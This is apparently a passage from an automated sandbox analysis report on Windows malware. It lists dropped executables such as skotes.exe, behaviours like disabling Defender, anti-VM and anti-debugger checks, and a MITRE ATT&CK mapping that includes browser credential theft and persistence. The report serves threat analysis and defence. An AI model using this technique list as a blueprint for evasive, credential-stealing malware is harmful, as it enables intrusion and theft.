    - Suspicious behavior: EnumeratesProcesses
    PID:2308
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4b394g.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4b394g.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Windows security modification
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2116

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5380 -ip 5380
1⤵
PID:6536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1252 -ip 1252
1⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2008

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion